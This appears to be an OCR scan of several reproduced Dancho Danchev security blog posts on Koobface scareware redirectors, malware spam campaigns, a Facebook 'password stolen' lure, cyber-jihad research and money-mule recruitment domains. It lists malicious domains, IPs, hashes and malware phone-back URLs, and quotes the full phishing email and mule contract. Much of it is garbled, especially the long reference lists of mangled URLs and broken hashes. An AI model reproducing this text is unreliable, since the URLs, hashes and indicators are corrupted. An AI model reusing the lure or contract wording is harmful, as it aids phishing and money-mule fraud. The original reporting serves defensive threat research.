u5a05qldnmr4jwqrnav3.com - Email: 
michaeltycoon@gmail. com 

uqlwedg9tr523wbafdzp.com - Email: 
michaeitycoon@gmaii. com 

vk4j2x7n49nqlil9vm5h.com - Email: 
michaeitycoon@gmaii. com 

ysut5gx094w2dddjtswh.com - Email: 
michaeltycoon@gmail. com 

Deja vu! Where do we know the 

michaeltycoon@gmail.com email from? From the "[13]A 
Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang" 

campaign, and in particular from the fact that it was once 



directly connected to the Koobface gang - this is not an 
email that was used to register a domain belonging to the 
scareware affiliate network, instead it's an email used to 
register a client-side exploits serving domain parked on the 
same IP where a hardcore Koobface C &C from Koobface 
1.0's infrastructure was responding to - urodinam.net 

• [14]Dissecting the Mass DreamHost Sites 
Compromise - " Moreover, on the exact same IP where 
Koobface gang's urodinam.net is parked, we also have the 
currently active Izabsiwvn538n4i5tcji.com - Email: 
michaeltycoon@gmail.com, serving client side exploits 
using the Yes Malware Exploitation kit - 91.188.59.10 

/temp/cache/PDF.php; admin panel at: 

Izabsiwvn538n4i5tcji.com /temp/admin/index.php" 

Blackhat 5E0 campaigns, migration from the Koobface- 
friendly AS31252, STARNET-AS StarNet Moldova , plus a 
direct connection established as once a customer is 
migrating, he's usually taking all of his dirty luggage with 
him, proves that, there's no such thing as coincidence 
within the cybercrime ecosystem, there's just a diverse 
infrastructure where everyone appears to be self-serving 
their needs as a service, consequently forwarding 
responsibility for 

someone else's actions to the infrastructure they are 
abusing. 

Related blackhat SEO/scareware monetization assessments: 

[15] Dissecting the 100,000+ Scareware Serving Fake 
YouTube Pages Campaign 

[16] Dissecting the Ongoing U.S Federal Forms 
Themed Blackhat SEO Campaign - Part Two 



[17] Blackhat SEO Campaign Hijacks U.S Federal Form 
Keywords > Serves Sea re ware 

[18] U.S Federal Forms Blackhat SEO Themed 
Scareware Campaign Expanding 

[19] Dissecting the Ongoing U.S Federal Forms 
Themed Blackhat SEO Campaign 

[20] The ultimate guide to scareware protection 

[21] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[22] Massive Scareware Serving Blackhat SEO, the 
Koobface Gang Style 

[23] A Peek inside the Managed Blackhat SEO 
Ecosystem 

[24] Dissecting a Swine Flu Black SEO Campaign 

[25] Massive Blackhat SEO Campaign Serving 
Scareware 

[26] From Ukrainian Blackhat SEO Gang With Love 

[27] From Ukrainian Blackhat SEO Gang With Love - 
Part Two 

[28] From Ukraine with Scareware Serving Tweets, 
Bogus Linkedin/Scribd Accounts, and Blackhat SEO 
Farms 

[2 9]From Ukraine with Bogus Twitter, Linked In and 
Scribd Accounts 



[30]Fake Web Hosting Provider - Front-end to 
Scareware Blackhat SEO Campaign at Biogspot 

This post has been reproduced from [31]Dancho 
Danchev's biog. Follow him [32Jon Twitter. 

1. htto://ddanchev.blo as oot.com/2010/03/koobface- 
redirectors-and-scareware.html 

2. htto://ddanchev.blo as oot. com/2010/04/dissectin a- 
koobface-aanas-latest.html 

3. htto.V/ddanchev.blo as oot.com/2010/05/koobface-aan a- 
resDonds-to-10-thin as- vou.html 
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4. htto.V/ddanchev.blo as oot. com/2010/05/from-koobface- 
aana-with-scareware.html 

5. htto.V/ddanchev.blo as oot. com/2010/08/soamvertised- 
best-buv-macvs-evite-and.html 

6 . 

httoV/www. virustotal. com/file-scan/reoort.html? 

id= 7272f889520cdl dl 898ccd91 fl bOl 835cf53f06b452041b 

aae0336 

796ff09fd7-1281703284 

7. htto.V/ddanchev.blo as oot. com/2010/08/soamvertised- 
best-buv-macvs-evite-and.html 

8. htto.V/oastebin.com/POUKr7aE 

9. 

htto.V/3. bo. blo as oot. com/_ wICHhTiOmrA/TGVGu 7E o il I/A AAA 








































A AAA Ezo/oa ThblEDFcU/sl 6 OO/Bla ckhat_ SE O Dutch S wiss_ s 
c 

a re ware 2. PNG 

10. htto://www. virustotal. com/file-scan/reoort. him I? 
id=63befe 78a 7895a8efc6d893491 d8f77ef8adalcd52d5625 

87490a7 

9f29b65336-1281711013 

11. htto.V/ddanche v. b lo g s oot, com/2010/07/exoloits- 
malware-and-scareware-courtesv.html 

12. htto.V/ddanchev. blo as oot. com/2010/07/exoloits- 
malware-and-scare ware~courtesv.html 

13. htto.V/ddanchev. blo as oot. com/2010/02/diverse-oortfolio- 
of-sca rewareblackhat.htm I 

14. htto.V/ddanche i/. blo as oot. com/2010/05/dissectina-mass- 
dreamhost-sites.html 

15. htto.V/ddanchev. blo as oot. com/2010/06/dissectin a- 
1 OOOOQ-scareware-servina.html 

16. htto.V/ddanchev. blo as oot. com/2010/06/dissectin a- 
on aoina-us-federal-forms.html 

17. htto.V/ddanchev. blo as oot. com/2009/08/blackhat-seo- 
camoaian-hiiacks-us. html 

18. htto.V/ddanchev. blo as oot. com/2009/08/us-federal-forms- 
blackhat-seo-themed. html 

19. htto.V/ddanchev. blo as oot. com/2009/08/dissectin o- 
on aoina-us-federal-forms. html 















































20. http://www.zdnet.com/bloa/securitv/the-ultimate-auide- 
to-sea re ware-orotection/4297 

21. http.V/ddanchev. blo as oot. com/2010/02/diverse-oortfolio- 
of-scare wareblackhat.html 

22. http.V/ddanche i/. bio as oot. com/2009/11/massive- 
scareware-servina-blackhat-seo.html 

23. http.V/ddanchev. bio as oot. com/2009/06/oeek-inside- 
manaaed-blackhat-seo.html 

24. http.V/ddanchev. bio as oot. com/2009/05/d issectina-swine- 
fiu-black-seo-camoaian.html 

25. http.V/ddanchev. bio as oot. com/2009/04/massive- 
blackhat-seo-campaian-servina.html 

26. http.V/ddanchev. bio as oot. com/2009/06/from-ukrainian- 
blackhat-seo-aana-with.html 

27. htto://ddanchev.bio as oot.com/2009/06/from-ukrainian- 
blackhat-seo-aana-with 09.html 

28. http.V/ddanchev. bio as oot. com/2009/06/from-ukraine- 
with-scare ware-serving, html 

29. http.V/ddanchev. bio as oot. com/2009/07/from-ukraine- 
with-boaus-twitter.htm I 

30. http.V/ddanchev.bio as oot.com/2009/06/fake-web- 
hostin a- orovider-front-end-to.html 

31. http.V/ddanchev. bio as oot. com/ 

32. htto://twitter, com/danchodanchev 
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Historical OS I NT: Celebrities Death, Fedex Invoices, 
Office-Themed Malware Campaigns (2010-09-08 
21:07) 

[l]As promised, this would be a pretty short historical 
OSiNT post - catching up is in progress - detailing the 
structure of several campaigns that took place throughout 
July-August, 2010, and (as always) try to emphasize on 

the connection with historical malware campaigns profiled 
on my personal blog. 

Campaigns of notice include: spamvertised " Celebrities 
death-themed emails", " Fedex shipment status themed 
invoices", and " Office-themed documents". 

Sample subjects: 

Angelina Jolie died; Gwen Stefani died; Oprah Winfrey died; 
Tom Cruise died; Application; Thursday Journal Club; End Of 
Rotation; Abstracts; Project Declaration; Residency Happy 
Hour: SOP POLICIES; Fwd: Updated Journal Club Handout 

Sample attachments: 

journal club articles.zip; Rotation Input Sheet.zip; ppi and c 
dif.zip; MSpeck.zip; ResidencyPrep.zip; speck Case 
presentation draft.zip; journal club template.zip 


Detection rates, phone back URLs, and connections with 
previously profiled campaigns: 

- [2jnews.exe - Trojan.Bredolab-993 - 40/43 (93.0 %) 

MD5: 44522def7cf2a42aa26f59c2ac4ced58 

SHA1: 2f60531b6e33d842eba505f3c3cb81 a3ff6e3e6a 

- [3 Journal club articles.exe - Backdoor/Bredoiab.edb - 
41/43 (95.3 %) 

MD5 : 72e90fdl264e731109dlb6b977b2c744 

SHA1: 0a36b882dlb4d8b42cc466ec286e95bbb2e77d49 

Upon execution, the samples phone back to: 

188.65.74.161 /mrmun sgjlgdsjrthrtwg.exe - A5424 73 

- DOWN 

194.28.112.3 7outlook.exe - A548691 - ACTIVE 

- [4joutlook.exe - TrojanSpy:Win32/Fitmu.A -17/43 (39.5 
%) 

MD5: 8f4eca49b87e36daael4b8549071 dece 
SHA1: 1 d390e9f8d6e744ead58dd6c424581419f732498 
Upon execution, the dropped sample phones back to: 
cuscuss.com -188.65.74.164 - Email: info@blackry.com 
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Responding to 188.65.74.164 at A542473 are also: 


wiggete.com - Email: info@blackry.com 
depenam.com - Email: info@blackry.com 
fishum.com - Email: info@blackry.com 
biackry.com - Email: info@blackry.com 

Two of the domains are know to have been serving client- 
side exploits, but the redirection is currently return¬ 
ing an error " Connect to 188.40.232.254 on port 80 ... 
failed". 

- depen am .com/count22.php 

- blackry .com/count21.php 

- vseohuenno .com/trans/b3/ -188.40.232.254 - Email: 
latertrans@gmail. com 

Responding to 188.40.232.254, AS24940 are also the 
following command and control, client-side exploit serv¬ 
ing domains: 

gurgamer.com - (New IP: 86.155.172.30) Email: 
latertrans@gmail. com 

moneybeerers.com - Email: latertrans@gmail.com 

daeshnew.com - (New IP: 86.145.158.90) Email: 
latertrans@gmail. com 

volosatyhren.com - Email: latertrans@gmail.com 
vyebyvglaz.com - Email: latertrans@gmail.com 



- [5]Fedexlnvoice _EE776129.exe - Win32/Oficla.LK - 41/ 
43 (95.3 %) 

MD5: d4e2875127f5cbdf797de7fl417f96a7 

SHA1: c2df8d8cl78142ba7bee48dbf9a9f68c32al4f5e 

Upon execution, the sample phones back to: 

ilovelasvegas .ru/web/St/bb.php?v=200 
& id=636608811 &b=24augNEW &tm= - 

109.196.134.44, AS39150 - Email: 

vadim.rinatovich@yandex.ru with x5vsm5.ru - Email: 

vadim.rinatovich@yandex.ru also parked there. 

Where do we know the vadim.rinatovich@yandex.ru email 
from? 

From two previously profiled campaigns 

"[6]Spamvertised iTunes Gift Certificates and CV 
Themed Mai ware Campaigns"; and " [7]Dissecting the 
Xerox WorkCentre Pro Scanned Document Themed 
Campaign" having a direct relationship with the Asprox 
botnet. 

This post has been reproduced from [8]Dane ho 
Danchev's blog. Follow him [9]on Twitter. 

1. htto://twitter, com/danchodanchev/status/23254748308 

2 . 

htto://www. virustotal. com/file-scan/report.html? 

id=261 fef064 71 fb9a90928e21 e02 7cb058cc84a 0c310995f3 

ca95ce0 
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6bea8f98cf-1283961575 

3. 

http://www. virustotal. com/file-scan/report.html? 
id=f6c4eJ4 72681 ae9ea4a0cl 9c fd 75c5ce864 77e4f48612e5 

43b219b 

c2 3d 5c9d29-1283961571 

4. 

http://www. virustptal. cpm/file-scan/report.html? 
id=616bc4458686384081be9a9b654a8b99b4cbbbf395b46 

50d01d4bc 

fe798119b4-1283962155 

5. 

http://www. virustptal. cpm/file-scan/report.html? 

id=01 f7ee45f242de43f733cl 5e0238ca09blcf8fe9ec8c7ca 7 

f4b95c 

a 7959c2934-1283961566 

6. http.V/ddanchev.b/p as ppt. cpm/2010/05/spamvertised- 
i tun es-aift-certifica tes. h tm I 

7. http://ddanchev.blp as ppt. cpm/2010/07Zdissectina-xerox- 
workcentre-pro-scanned.html 

8. http://ddanchev.blp as ppt. cpm/ 

9. http://twitter.cpm/danchpdanchev 
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Summarizing 3 Years of Research Into Cyber Jihad 
(2010-09-11 16:24) 

From the "been there, actively researched that" 
department. 

1. [lJTracking Down Internet Terrorist Propaganda 

2. [2]Arabic Extremist Croup Forum Messages' 
Characteristics 

3. [3]Cyber Terrorism Communications and 
Propaganda 

4. [4]A Cost-Benefit Analysis of Cyber Terrorism 

5. [5]Current State of Internet Jihad 

6. [6]Anaiysis of the Technical Mujahid - Issue One 

7. [7] Full List of Hezbollah's Internet Sites 

8. [8]Steganography and Cyber Terrorism 
Communications 

9. [9]Hezbollah's DNS Service Providers from 1998 to 
2006 

10. [lOJMujahideen Secrets Encryption Tool 

11. [llJAnalyses of Cyber Jihadist Forums and Blogs 

12. [12]Cyber Traps for Wannabe Jihadists 


13. [13]lnshallahshaheed - Come Out, Come Out 
Wherever You Are 

14. [14JCIMF Switching Blogs 

15. [15JCIMF Now Permanently Shut Down 

16. [16JGIMF - "We Will Remain" 

17. [17]Wisdom of the Anti Cyber Jihadist Crowd 

18. [18]Cyber Jihadist Blogs Switching Locations 
Again 

19. [19]Eiectronic Jihad v3.0 - What Cyber Jihad isn't 

20. [20]Electronic Jihad's Targets List 

21. [21]Teaching Cyber Jihadists How to Hack 

22. [22]A Botnet of Infected Terrorists? 

23. [23]lnfecting Terrorist Suspects with Malware 

24. [24]The Dark Web and Cyber Jihad 
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25. [25]Cyber Jihadist Hacking Teams 

26. [26]Two Cyber Jihadist Blogs Now Offline 

27. [27]Characteristics of Islamist Websites 

28. [28]Cyber Traps for Wannabe Jihadists 

29. [29]Mujahideen Secrets Encryption Tool 



30. [30] An Analysis of the Technical Mujahid - Issue 
Two 

31. [31 ]Terrorist Croups' Brand Identities 

32. [32] A List of Terrorists' Blogs 

33. [33]Jihadists' Anonymous Internet Surfing 
Preferences 

34. [34]Sampling Jihadists' IPs 

35. [35]Cyber Jihadists' and TOR 

36. [36] A Cyber Jihadist DoS Tool 

37. [37]CIMF Now Permanently Shut Down 

38. [38]Mujahideen Secrets 2 Encryption Tool 
Released 

39. [39]Terror on the Internet - Conflict of Interest 

This post has been reproduced from [40]Dancho 
Danchev's blog. Follow him [41]on Twitter. 

1. htto://ddanchev.blo as oot.com/2006/06/trackina-down- 
internet-terrorist.html 

2. htto://ddanchev.blo as oot. com/2006/05/arabic-extremist- 
arouD-forum-messaaes. html 

3. htto://ddanchev. blo as oot. com/2006/08/c vber- terrorism - 
communications-and 22. him I 

4. htto.V/ddanchev.blo as oot. com/2006/10/cost-benefit- 
ana lvsis-of-cvber.htm / 




















5. htto.V/ddanchev.blo as oot.com/2006/12/current-state-of- 
internet-iihad.html 


6. htto.V/ddanchev.blo as oot.com/2006/12/analvsis-of- 
technical-muiahid-issue-one.html 

7. htto://ddanchev.blo as oot.com/2006/12/full-list-of- 
hezbollahs-internet-sites.html 

8. htto://ddanchev.blo as oot. com/2006/08/steaano araohv- 
and-cvber-terrorism. html 

9. htto.V/ddanchev.blo as oot.com/2006/09/hezbollahs-dns- 
service-oro viders-from. html 

10. htto.V/ddanche v. blo as oot. com/2007/04/m uiahideen- 
secrets-encr v otion-tool. html 

11. htto.V/ddanchev. blo as oot. com/2007/08/analvses-of- 
c vber-iihadist-forums-and.html 

12. htto.V/ddanchev. blo as oot. com/2007/03/cvber-traos-for- 
wannabe- i ihadists.html 

13. 

htto.V/ddanche v. blo as oot. com/2007/12/inshallahshaheed- 
come-out-come-out.html 

14. htto.V/ddanchev. blo as oot. com/2007/07/aimf-switchin a- 
bloas.html 

15. htto.V/ddanchev.blo as oot.com/2007/08/aimf-now- 
oermanentlv-shut-down.html 


16. htto.V/ddanche v. blo as oot. com/2007/08/a imf- we-will- 
remain.html 
























































17. htto.V/ddanchev.blo as oot. com/2007/10/wisdom-of-anti- 
c vber-iihadist-crowd.html 

18. htto.V/ddanchev.blo as oot.com/2007711/cvber-iihadist- 
bloas-switchina. html 

19. htto.V/ddanche i/. blo as oot. com/2007/11/electronic-iihad- 
v30- wha t-cvber-iihad. html 

20. htto.V/ddanchev. blo as oot. com/2007/11/electronic-iihads- 
taraets-list.html 

21. htto.V/ddanchev.blo as oot.com/2007/11/teachin a-c vber- 
iihadists-how-to-hack. html 

22. htto.V/ddanchev. blo as oot. com/2007/11/botnet-of- 
snfected-terrorists.html 

23. htto.V/ddanchev. blo as oot. com/2007/09/infectin a- 
terrorist-susoects- with, html 
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24. htto.V/ddanche i/. blo as oot. com/2007/09/dark- web-and- 
c vber-iihad.html 

25. htto.V/ddanchev. blo as oot. com/2007/12/cvber-iihadist- 
hackina-teams. html 

26. htto.V/ddanchev. blo as oot. com/2007/09/two-cvber- 
iihadist-bloas-no w-off1ine.html 

27. htto.V/ddanche i/. blo as oot.com/2007/02/characteristics- 
of-islamist-websites.htmI 

28. htto.V/ddanchev. blo as oot. com/2007/03/cvber-traos-for- 
wannabe-iihadists.html 


























































29. htto.V/ddanchev.blo as oot. com/2007/04/muiahideen- 
secrets-encr v otion-tool. html 

30. htto.V/ddanchev.blo as oot. com/2007/06/analvsis-of- 
technical-muiahid-issue-two.html 

31. htto.V/ddanchev. blo as oot. com/2007/07/terrorist-arouos- 
brand-identities. html 

32. htto.V/ddanchev. blo as oot. com/2007/06/list-of-terrorists- 
bloas.html 

33. htto.V/ddanchev.blo as oot. com/2007/05/iihadists- 
anonvmous-internet-surfina.html 

34. htto.V/ddanchev. blo as oot. com/2007/05/samolin a- 
iihadists-ios. html 

35. htto.V/ddanchev. blo as oot. com/2007/07/cvber-iihadists- 
and-tor.html 

36. htto.V/ddanchev. blo as oot. com/2007/08/cvber-uhadist- 
dos-tool.html 

37. htto.V/ddanchev.blo as oot.com/2007/08/aimf-now- 
oermanentlv-shut-down.html 

38. htto.V/ddanchev.blo as DOt.com/20Q8/01/muiahideen- 
secrets-2-encr v otion-tool.html 

39. httoV/ddanchev. blo as oot. com/2008/03/terror-on- 
internet-conflict-of-interest.html 

40. htto.V/ddanchev. blo as oot. com/ 

41. htto://twitter, com/danchodanchev 
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Top Ten Must-Read DDanchev Posts For 2010 (2011- 
01-22 00:25) 

01. [l]How the Koobface Gang Monetizes Mac OS X Traffic 

02. [2JAS50215 Troyak-as Taken Offline, Zeus C &Cs Drop 
from 249 to 181 

03. [3]The DNS Infrastructure of the Money Mule 
Recruitment Ecosystem 

04. [4]The Avalanche Botnet and the TROYAK-AS 
Connection 

05. [5]Koobface Gang Responds to the "10 Things You 
Didn't Know About the Koobface Gang Post" 

06. [6]Sampling Malicious Activity Inside Cybercrime- 
Friendly Search Engines 

07. [7]GazTransitStroy/GazTranZitStroy: From Sea re ware to 
Zeus Crimeware and Client-Side Exploits 


08. [8]Dissecting North western Bank's Client-Side Exploits 
Serving Site Compromise 

09. [9]U.S. Treasury Site Compromise Linked to the 
NetworkSolutions Mass Word Press Blogs Compromise 

10. [10]TorrentReactor.net Serving Crime ware, Client-Side 
Exploits Through a Malicious Ad 

This post has been reproduced from [HJDancho Danchev's 
blog. 

1. htto.V/ddanchev.blo as oot.com/2010/02/how-koobface- 
aana-monetizes-mac-os-x.html 

2. htto.V/ddanchev.blo as oot.com/2010/03/as50215-trovak- 
as-taken-offIine-zeus-c.html 

3. htto://ddanchev.blo as oot.com/2010/04/dns- 
infrastructure-of-monev-mule.html 

4. htto://ddanchev.blo as oot. com/2010/05/avalanche-botnet- 
and-trovak-as.html 

5. htto.V/ddanchev.blo as oot.com/2010/05/koobface-aan a- 
resoonds-to-10-thin as- vou.html 

6. htto.V/ddanchev.blo as oot. com/2010/07/samolin a- 
malicious-acti vitv- inside, html 
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7. 

htto.V/ddanche v. blo as oot. com/2010/03/aaztransitstro v aaztr 
anziistro v-from.htmi 


8. htto.V/ddanchev.blo as oot.com/2010/04/dissectin a- 
north western-banks-client.html 



































9. htto.V/ddanchev.blo as oot.com/2010/05/us-treasurv-site- 
comoromise-linked-to. html 

10 . 

htto://ddanche v. blo as oot. com/2010/05/torrentreactornet- 
servina-crimeware.html 

11. htto.V/ddanchev. blo as oot. com/ 
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Top Ten Must-Read Posts at ZDNet's Zero Day for 
2010 (2011-01-22 12:06) 

01. [IJSeven myths about zero day vulnerabilities 
debunked 

02. [2]Should a targeted country strike back at the cyber 
attackers? 

03. [3]5 reasons why the proposed ID scheme for Internet 
users is a bad idea 

04. [4]Hotmail's new security features i/s Gmail's old 
security features 

05. [5]Attack of the Opt-ln Botnets 

06. [6]From Russia with (objective) spam stats 

07. [7]The current state of the crimeware threat - Q &A 

08. [8]Mac 05 X SMS ransomware - hype or real threat? 

09. [9] 10 things you didn't know about the Koobface gang 













10. [10]Goog\e-China cyber espionage saga - FAQ 

This post has been reproduced from [11] Dane ho Danchev's 
blog. 

1. htto://www.zdnet.com/bloa/securitv/seven-mvths-about- 
zero-dav-vulnerabilities-debunked/7026 

2. httD://www.zdnet.com/bloa/securitv/should-a-taraeted- 
countrv-strike-back-at-the-cvber-attackers/6194 

3. htto://www.zdnet. com/bloa/securitv/5-reasons-whv-the- 
orooosed-id-scheme-for-intemet-users-is-a-bad-idea/ 

6527 

4. httD://www.zdnet.com/bloa/securitv/hotmails-new- 
securitv-features-vs-amaUs-old-securitv-features/6509 

5. httD://www.zdnet.com/bioa/securitv/attack-of-the-ODt-in- 
botnets/6268 
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6. htto://www.zdnet.com/bloa/securitv/from-russia-with- 
ob iective-spam-stats/5813 

7. httD://www.zdnet.com/bioa/securitv/the-current-state-of- 
the-crimeware-threat-a-a/5 797 

8. httD://www.zdnet.com/bioa/securitv/mac-os-x-sms- 
ransom ware-h v oe-or-real-threa t/5731 

9. htto://www.zdnet.com/bloa/securitv/10-thin as- vou-didnt- 
know-about-the-koobface-aana/5452 

10. httD://www.zdnet.com/bloa/securit v/ aooale-china-cvber- 
es oionaae-saaa-faa/5259 






























































11. htto.Y/ddanchev. blo as oot. com/ 
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Spamvertised "Your password has been stolen!" 
Malware Campaign Circulating (2011-01-26 20:30) 

A currently ongoing spamvertised campaign, attempts to 
impersonate the most popular social networking site, 

Facebook. 

Using a well proven "Your password has been stolen!" 
theme, the campaign entices the end user into downloading 
and executing the malware. Social engineering-driven 
campaigns targeting Facebook, remain among the 

popular malware campaign spreading techniques due to the 
ease of execution. 

Subject: Facebook Support. Your password has been 
stolen! ID50888 

Message: Good afternoon. 

A Spam is sent from your FaceBook account. 

Your password has been changed for safety. Information 
regarding your account and a new password is at¬ 
tached to the letter.Read this information thoroughly and 
change the password to complicated one. Please do not 
reply to this email, it's automatic mail notification! Thank 
you for your attention. Your Facebook! 




Spamvertised filedname: Facebook details _ID76803.zip 
(32,458 bytes) 

Detecrion rate: 

Facebook_details.exe - [1 JTrojan- 
Downloader:W32/Koobface.HV -12/43 (27.9 %) 

MD5 : fOe7a8c264fel4562ca8ac98abb35840 

SHA1 : f68dl5e66590c69ac75c46a09ae495be8bbf231f 

SHA256: 

3ca757bfdecbee20ecl0d5af770700041f4bclbl7ee3123f4d 
85acfdl9elbb7 4 

Upon execution, the sample phones back to: 

Phones back to: 

intervie wbuy. ru /forum/document, doc 
interviewbuy.ru /forum/load.php?file=0 
intervie wbuy. ru /forum/load.php ?file=l 
intervie wbuy. ru /forum/load.php ?fiie=2 
intervie wbuy. ru /forum/load.php ?file=3 
intervie wbuy. ru /forum/load.php ?fiie=4 
intervie wbuy. ru /forum/load.php ?file=5 
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intervie wbuy. ru /forum/load.php ?file=6 



intervie wbuy. ru /forum/load.php ?file=7 

interviewbuy.ru /forum/load.php?file=8 

intervie wbuy. ru /forum/load.php ?file=9 

intervie wbuy. ru /forum/load.php ?file=ftpgrabber 

intervie wbuy. ru /forum/load.php ?file=pokergrabber 

interviewbuy.ru - 91.204.48.96 (AS24965); 
124.217.248.229 (AS45839) Email: 
servmanl976@yandex. ru 

ZeuS crimeware activity at [2JAS24965 (SPOINT-AS 
S.Point LTD) as well as [3]SpyEye malicious activity is 

also observed. 

This post has been reproduced from [4]Dancho Danchev's 
blog. 

1 . 

htto j7/www. virustotal. com/file-scan/reDort.html? 
id=3ca757bfdecbee20ecl0d5af770700041f4bclbl 7ee3123 

f4d85ac 

fdl 9 el bb 74-1296061852 

2. httDs://zeustracker.abuse, ch/monitor. oh o ?as=24965 

3. httos://s ove vetracker.abuse.ch/monitor. oh o?as=24965 

4. http.V/ddanchev.blo as oot. com/ 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Five (2011-01-31 12:58) 

With money mule recruitment continuing to represent the 
most actively used risk-forwarding tactic within the 
cybercrime ecosystem for the purpose of securely 
distribution fraudulently obtained funds, part five of the " 

[lJKeeping Money Mule Recruiters on a Short Leash" 

series are here to stay 

What's particularly interesting about the money mule 
recruitment domain portfolio that I'll expose, is the logi¬ 
cal progression from bogus companies offering financial 
services, to a diverse set of companies occupying multiple 
markets/covering different market segments. 

- Current trends - Localization and 
standardiza tion/templa te-tiza tion 

A great example of this trend - largely driven by the 

[2]standardization and template-zation of money 
mule 

recruitment sites as a service- is Schwartz & Brothers 
LLC (schwartz-brothers.cc). 

" Schwartz & Brothers LLC is the first choice for artists and 
buyers alike! Schwartz & Brothers LLC is an effective tool 
for the artist and emerging artist to market and promote 
their art in a professional and inexpensive manner. 

We will market your art to the international community of 
art buyers. Whether you are looking to buy or sell original 
art, Schwartz & Brothers LLC is the premier art site for those 
seeking to buy or sell original art online. " 
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From financial services to an entirely new market segment, 
whereas the entire recruitment process remains pretty 

static, excluding several time quality assurance oriented 
details. For instance, every potential mule is required to 
download a entry level job psychological test, which 
surprisingly asks directly whether the mule is from 
Australia, next to automatically choosing Australia as a 
country of origin at a later stage throughout the registration 
process. 

Moreover, in the context of quality assurance, the recruiters 
also ask the applicant" Are you/were you con-victed? " in 
an attempt to combine the survey results with other details 
such the opening date of the bank account, as well as the 
average daily/weekly/monthly amount transferred. 

- The Terms of Service 
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" DUTIES: 

The Contractor undertakes the responsibility to receive 
payments from the Clients of the Company to his personal 
bank account, withdraw cash and to process payments to 
the Company's partners by Western Union or MoneyGram 

money transfer system within one (1) day. FI e/s he will report 
directly to the senior manager and to any other party 
designated by the senior manager in connection with the 
performance of the duties under this Agreement and shall 


fulfill any other duties reasonably requested by the 
Company and agreed to by the Contractor. 

CONFIDENTIALITY: 

The Contractor acknowledges that during the engagement 
he will have access to and become acquainted with 

various trade secrets, inventions, innovations, processes, 
information, records and specifications owned or licensed 
by the Company and/or used by the Company in connection 
with the operation of its business including, 

without limitation, the Company's business and product 
processes, methods, customer lists, accounts and 
procedures. 

The Contractor agrees that he will not disclose any of the 
aforesaid, directly or indirectly, or use any of them in any 
manner, either during the term of this Agreement or at any 
time thereafter. AH files, records, documents, blueprints, 
specifications, information, letters, notes, media lists, 
original artwork/creative, notebooks, and similar items 
relating to the business of the Company, whether prepared 
by the Contractor or otherwise coming into his possession, 
shall remain the exclusive property of the Company. 
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The Contractor shall not retain any copies of the foregoing 
without the Company's prior written permission. 

The Contractor further agrees that he will not disclose his 
retention as an independent contractor or the terms of this 
Agreement to any person without the prior written consent 
of the Company and shall at all times preserve the 



confidential nature of his relationship to the Company and 
of the services hereunder. 

If the Contractor releases any of the above information to 
any parties outside of this company, such as per¬ 
sonal friend, close relatives or other Financial Institutions 
such as a Bank or other Financial Firms, such could be 
considered grounds for immediate termination. If the 
Contractor is ever in doubt of what information can be 
released and when, the Contractor will contact their 
superior right away. 

TERMS OF ENGAGEMENT: 

The Contractor is engaged by the Company on terms of 
thirty-days (30) probationary period. During the 
probationary 

period the Company undertakes to pay to the 
Contractor the base salary amounting to AUD 2300 
per month 

plus 8 % commission from each payment processing 
operation. After the probationary period the 
Company 

agrees to revise and raise the base salary to 3000 

USD. The Company has the right to cancel this Agreement 
at any time within the probationary period or refuse to 
extend it after that, should the Contractor refuse to fulfill 
his/her obligations under this Agreement or fulfills them not 
in good faith. The Contractor has the right to terminate the 
Agreement at any time on condition that he/she has 
processed all previous payments and has no new 
instructions. 



COMPENSATION: 


The Company undertakes to pay taxes accrued in 
connection with money transfer. The Company shall also 
reimburse part of expenses which are incurred in 
connection with money transfer by Western Union or 
MoneyGram systems 

(should money transfer charges exceed 3 %, i.e. 
commission for payment processing operation). The above 
difference will be automatically added to the base salary of 
the Contractor and paid once per month together with the 
base salary. 

The Company shall have the right to decrease the 
Contractor's commission in case the payment processing 

terms were violated by the Contractor. Should the 
Contractor delays re-sending money accepted to his bank 
account for the period exceeding one (1) day without any 
explicit reason, the Company shall have the right to impose 
sanctions on the Contractor if only the delay has not been 
caused by the Force Majeur circumstances and to apply to 
the arbitration and claim for the reimburse of the amount 
transferred to his account or for compensation for other 
damage if any, evicted due to the delay. 

The Contractor may take days off at any time and at his/her 
option upon giving five (5) working days advance 

notice in writing or three (3) working days advance notice 
via e-mail or fax to the Company in order that the latter 
may abstain from charging the Contractor with new 
instructions. However, salary for each day-off is deducted 
from the Contractor's base salary. " 

- OSINT data for money mule recruitment sites 



The following portfolio of money mule recruitment domains 
appears to have been registered using automated email 

registration tools, with the potential for [3]CAPTCHA 
outsourcing clearly considered by the malicious parties, 
taking into consideration the even decreasing price for 
solving CAPTCHA challenges. 

4STAR-SOLUTIONS.CC - Email: urge@bz3.ru 

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru 

ACOONGROUP-LLC.CO - Email: jx@ppmail.ru 

AIMIC-GROUPLLC.CC - 98.141.220.118 - Email: 
aryan@ppmail. ru 

AMINA-GROUPCO.CO - Email: beige@ca4.ru 
AMINA-GROUPINC.CC - Email: zowie@yourisp.ru 
AMINAORG.CC - Email: range@ppmail.ru 
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ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHISGOLDGROUP-INC. CO Email: ira@bz3.ru 
AUS-FINANCE.ee - Email: ours@ca4.ru 
BREDGAR-GROUPLLC.CC - Email: zoe@ca4.ru 
BREDGARGROUP-LLC.CO - Email: judo@free-id.ru 


CESIS-GROUPLLC.CC - Email: el@cheapbox.ru 
CESISGROUP-LLC.CC - Email: fiip@free-id.ru 
CESIS-GROUPLLC.CO - Email: our@ca4.ru 
COCOONGROUP-LLC.HK - Email: most@cheapbox.ru 
CORES-GROUP.CC - Email: jaunt@cheapbox.ru 
CORESGROUP-INC.CO - Email: yule@cheapbox.ru 
CORES-GROUPLTD.CO - Email: Iiszt@bz3.ru 
CRAFT-GROUPNET.CC - Email: room@yourisp.ru 
DILIGENCE-GROUP. CO - Email: twig@ppmail.ru 
DILIGENCE-GROUPINC.CC - Email: till@cheapbox.ru 
DUNCROFT-GROUP-INC.CC - Email: swiss@ca4.ru 
DUNCROFTGROUP-INC.CO - Email: shoot@ppmail.ru 
ELSDEN-GROUPINC.HK - Email: lost@ppmail.ru 
FARLINE-FIN.CO - Email: pecks@free-id.ru 
FARLINE-FININC.CC - Email: cynic@free-id.ru 
FILEGROUP-LLC.CO - Email: knelt@ca4.ru 
FtNTEC-LTD.ee - Email: w@yourisp.ru 
